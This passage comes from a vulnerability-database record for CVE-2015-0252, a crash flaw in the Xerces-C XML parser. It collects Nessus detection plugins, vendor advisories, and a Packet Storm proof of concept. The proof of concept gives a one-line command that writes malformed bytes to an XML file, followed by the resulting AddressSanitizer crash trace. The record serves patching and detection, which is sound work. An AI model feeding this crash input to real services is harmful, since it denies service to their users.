from Fedora Security Advisory 2015-4321.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82439);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0252\");\n script_bugtraq_id(73252);\n script_xref(name:\"FEDORA\", value:\"2015-4321\");\n\n script_name(english:\"Fedora 21 : mingw-xerces-c-3.1.1-11.fc21 (2015-4321)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-0252.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1199103\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153903.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?760a4166\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mingw-xerces-c package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-xerces-c\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"mingw-xerces-c-3.1.1-11.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-xerces-c\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:24:28", "bulletinFamily": "scanner", "description": "A flaw was found in the way the Xerces-C XML parser processed certain XML documents. A remote attacker could provide specially crafted XML input that, when parsed by an application using Xerces-C, would cause that application to crash. (CVE-2015-0252)", "modified": "2018-12-28T00:00:00", "id": "SL_20150629_XERCES_C_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84541", "published": "2015-07-06T00:00:00", "title": "Scientific Linux Security Update : xerces-c on SL7.x x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84541);\n script_version(\"2.2\");\n script_cvs_date(\"Date: 2018/12/28 10:10:36\");\n\n script_cve_id(\"CVE-2015-0252\");\n\n script_name(english:\"Scientific Linux Security Update : xerces-c on SL7.x x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way the Xerces-C XML parser processed certain\nXML documents. A remote attacker could provide specially crafted XML\ninput that, when parsed by an application using Xerces-C, would cause\nthat application to crash. (CVE-2015-0252)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1506&L=scientific-linux-errata&F=&S=&P=14887\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9ae14483\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xerces-c-3.1.1-7.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xerces-c-debuginfo-3.1.1-7.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xerces-c-devel-3.1.1-7.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"xerces-c-doc-3.1.1-7.el7_1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:49", "bulletinFamily": "scanner", "description": "Update to xerces-c 3.1.2, fixing CVE-2015-0252.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2015-4272.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82285", "published": "2015-03-27T00:00:00", "title": "Fedora 22 : mingw-xerces-c-3.1.2-1.fc22 (2015-4272)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4272.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82285);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0252\");\n script_bugtraq_id(73252);\n script_xref(name:\"FEDORA\", value:\"2015-4272\");\n\n script_name(english:\"Fedora 22 : mingw-xerces-c-3.1.2-1.fc22 (2015-4272)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to xerces-c 3.1.2, fixing CVE-2015-0252.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1199103\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153094.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?324af1db\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mingw-xerces-c package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-xerces-c\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"mingw-xerces-c-3.1.2-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-xerces-c\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:49", "bulletinFamily": "scanner", "description": "Anton Rager and Jonathan Brossard from the Salesforce.com Product Security Team and Ben Laurie of Google discovered a denial of service vulnerability in xerces-c, a validating XML parser library for C++.\nThe parser mishandles certain kinds of malformed input documents, resulting in a segmentation fault during a parse operation. An unauthenticated attacker could use this flaw to cause an application using the xerces-c library to crash.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-07-06T00:00:00", "id": "DEBIAN_DLA-181.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82298", "published": "2015-03-30T00:00:00", "title": "Debian DLA-181-1 : xerces-c security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-181-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82298);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/06 11:26:06\");\n\n script_cve_id(\"CVE-2015-0252\");\n script_bugtraq_id(73252);\n\n script_name(english:\"Debian DLA-181-1 : xerces-c security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Anton Rager and Jonathan Brossard from the Salesforce.com Product\nSecurity Team and Ben Laurie of Google discovered a denial of service\nvulnerability in xerces-c, a validating XML parser library for C++.\nThe parser mishandles certain kinds of malformed input documents,\nresulting in a segmentation fault during a parse operation. An\nunauthenticated attacker could use this flaw to cause an application\nusing the xerces-c library to crash.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/03/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/xerces-c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxerces-c-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxerces-c-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxerces-c-samples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxerces-c3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libxerces-c-dev\", reference:\"3.1.1-1+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libxerces-c-doc\", reference:\"3.1.1-1+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libxerces-c-samples\", reference:\"3.1.1-1+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libxerces-c3.1\", reference:\"3.1.1-1+deb6u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:18", "bulletinFamily": "exploit", "description": "", "modified": "2015-05-05T00:00:00", "published": "2015-05-05T00:00:00", "href": "https://packetstormsecurity.com/files/131756/Apache-Xerces-C-XML-Parser-Denial-Of-Service.html", "id": "PACKETSTORM:131756", "type": "packetstorm", "title": "Apache Xerces-C XML Parser Denial Of Service", "sourceData": "`# Exploit Title: Apache Xerces-C XML Parser (< 3.1.2) DoS POC \n# Date: 2015-05-03 \n# Exploit Author: beford \n# Vendor Homepage: http://xerces.apache.org/#xerces-c \n# Version: Versions prior to 3.1.2 \n# Tested on: Ubuntu 15.04 \n# CVE : CVE-2015-0252 \n \nApache Xerces-C XML Parser Crashes on Malformed Input \n \nI believe this to be the same issue that was reported on CVE-2015-0252, \nposting this in case anyone is interested in reproducing it. \n \nOriginal advisory: \nhttps://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt \n \n$ printf \"\\xff\\xfe\\x00\\x00\\x3c\" > file.xml \n \n$ DOMPrint ./file.xml # Ubuntu 15.04 libxerces-c3.1 package \nSegmentation fault \n \n$ ./DOMPrint ./file.xml # ASAN Enabled build \n================================================================= \n==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c \nat pc 0x836a721 bp 0xbf8127a8 sp 0xbf812798 \nREAD of size 1 at 0xb5d9d87c thread T0 \n#0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer() \nxercesc/internal/XMLReader.cpp:1719 \n#1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*, \nunsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761 \n#2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer() \nxercesc/internal/XMLReader.cpp:576 \n#3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short \nconst*) xercesc/internal/XMLReader.cpp:1223 \n#4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short \nconst*) xercesc/internal/ReaderMgr.hpp:385 \n#5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool) \nxercesc/internal/XMLScanner.cpp:1608 \n#6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog() \nxercesc/internal/XMLScanner.cpp:1244 \n#7 0x8d69220 in \nxercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) \nxercesc/internal/IGXMLScanner.cpp:206 \n#8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short \nconst*) xercesc/internal/XMLScanner.cpp:400 \n#9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) \nxercesc/internal/XMLScanner.cpp:408 \n#10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) \nxercesc/parsers/AbstractDOMParser.cpp:601 \n#11 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398 \n#12 0xb6f5272d in __libc_start_main \n(/lib/i386-linux-gnu/libc.so.6+0x1872d) \n#13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5) \n \n0xb5d9d87c is located 0 bytes to the right of 163964-byte region \n[0xb5d75800,0xb5d9d87c) \nallocated by thread T0 here: \n#0 0xb72c3ae4 in operator new(unsigned int) \n(/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4) \n#1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int) \nxercesc/internal/MemoryManagerImpl.cpp:40 \n#2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int, \nxercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68 \n#3 0x8daaaa7 in \nxercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&) \nxercesc/internal/IGXMLScanner2.cpp:1284 \n#4 0x8d6912a in \nxercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) \nxercesc/internal/IGXMLScanner.cpp:198 \n#5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short \nconst*) xercesc/internal/XMLScanner.cpp:400 \n#6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) \nxercesc/internal/XMLScanner.cpp:408 \n#7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) \nxercesc/parsers/AbstractDOMParser.cpp:601 \n#8 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398 \n#9 0xb6f5272d in __libc_start_main \n(/lib/i386-linux-gnu/libc.so.6+0x1872d) \n \nSUMMARY: AddressSanitizer: heap-buffer-overflow \nxercesc/internal/XMLReader.cpp:1719 \nxercesc_3_1::XMLReader::refreshRawBuffer() \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131756/apachexercescxml-dos.txt"}], "centos": [{"lastseen": "2017-10-03T18:25:28", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:1193\n\n\nXerces-C is a validating XML parser written in a portable subset of C++.\n\nA flaw was found in the way the Xerces-C XML parser processed certain XML\ndocuments. A remote attacker could provide specially crafted XML input\nthat, when parsed by an application using Xerces-C, would cause that\napplication to crash. (CVE-2015-0252)\n\nAll xerces-c users are advised to upgrade to this updated package, which\ncontains a backported patch to correct this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-June/021228.html\n\n**Affected packages:**\nxerces-c\nxerces-c-devel\nxerces-c-doc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1193.html", "modified": "2015-06-29T16:37:38", "published": "2015-06-29T16:37:38", "href": "http://lists.centos.org/pipermail/centos-announce/2015-June/021228.html", "id": "CESA-2015:1193", "title": "xerces security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "kaspersky": [{"lastseen": "2019-02-19T17:03:26", "bulletinFamily": "info", "description": "### *Detect date*:\n03/24/2015\n\n### *Severity*:\nWarning\n\n### *Description*:\nAn unspecified vulnerability was found in Apache Xerces-C. By exploiting this vulnerability malicious users can cause denial of service. This vulnerability can be exploited remotely via a specially designed XML data.\n\n### *Affected products*:\nApache Xerces-C versions earlier than 3.1.2\n\n### *Solution*:\nUpdate to latest version! \n[Get Apache Xerces-C](<http://xerces.apache.org/xerces-c/download.cgi>)\n\n### *Original advisories*:\n[Apache bulletin](<http://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt>) \n\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Xerces](<https://threats.kaspersky.com/en/product/Xerces/>)\n\n### *CVE-IDS*:\n[CVE-2015-0252](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0252>)", "modified": "2019-02-15T00:00:00", "published": "2015-03-24T00:00:00", "id": "KLA10496", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10496", "title": "\r KLA10496Denial of service vulnerability in Apache Xerces ", "type": "kaspersky", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:41:22", "bulletinFamily": "unix", "description": "[3.1.1-7]\nResolves: rhbz#1217104 CVE-2015-0252", "modified": "2015-06-29T00:00:00", "published": "2015-06-29T00:00:00", "id": "ELSA-2015-1193", "href": "http://linux.oracle.com/errata/ELSA-2015-1193.html", "title": "xerces-c security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T17:41:13", "bulletinFamily": "unix", "description": "Xerces-C is a validating XML parser written in a portable subset of C++.\n\nA flaw was found in the way the Xerces-C XML parser processed certain XML\ndocuments. A remote attacker could provide specially crafted XML input\nthat, when parsed by an application using Xerces-C, would cause that\napplication to crash. (CVE-2015-0252)\n\nAll xerces-c users are advised to upgrade to this updated package, which\ncontains a backported patch to correct this issue.\n", "modified": "2018-04-12T03:33:05", "published": "2015-06-29T04:00:00", "id": "RHSA-2015:1193", "href": "https://access.redhat.com/errata/RHSA-2015:1193", "type": "redhat", "title": "(RHSA-2015:1193) Moderate: xerces-c security update", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:48", "bulletinFamily": "unix", "description": "- CVE-2015-0252 (denial of service)\n\nThe Xerces-C XML parser mishandles certain kinds of malformed input\ndocuments, resulting in a segmentation fault during a parse operation.\nThe bug does not appear to allow for remote code execution, but is a\ndenial of service attack that in many applications may allow for an\nunauthenticated attacker to supply malformed input and cause a crash.", "modified": "2015-03-20T00:00:00", "published": "2015-03-20T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-March/000260.html", "id": "ASA-201503-19", "title": "xerces-c: denial of service", "type": "archlinux", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "oracle": [{"lastseen": "2018-12-19T04:53:24", "bulletinFamily": "software", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/securityalerts>) for information about Oracle Security Advisories.\n\n \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 301 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2018 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2456979.1>).\n", "modified": "2018-10-16T00:00:00", "published": "2018-12-18T00:00:00", "id": "ORACLE:CPUOCT2018-4428296", "href": "", "title": "CPU Oct 2018", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
